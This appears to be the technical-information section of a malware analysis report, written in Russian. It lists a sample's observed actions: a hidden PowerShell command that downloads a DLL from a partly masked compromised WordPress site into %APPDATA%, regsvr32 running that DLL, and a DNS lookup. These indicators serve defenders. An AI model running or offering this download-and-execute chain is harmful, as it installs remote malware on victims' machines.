Техническая информация
- '<SYSTEM32>\regsvr32.exe' %APPDATA%\filename.dll,DllRegisterServer
- %APPDATA%\filename.dll
- http://ta#####rtcreations.com/wp-includes/js/tinymce/themes/inlite/crypt_da11.dll
- DNS ASK ta#####rtcreations.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "& {(New-Object Net.WebClient).DownloadFile('http://ta#####rtcreations.com/wp-includes/js/tinymce/themes/inlite/crypt_da11.dll','%APPDATA%\filename.dll')}"' (со скрытым окном)
- '<SYSTEM32>\regsvr32.exe' %APPDATA%\filename.dll,DllRegisterServer' (со скрытым окном)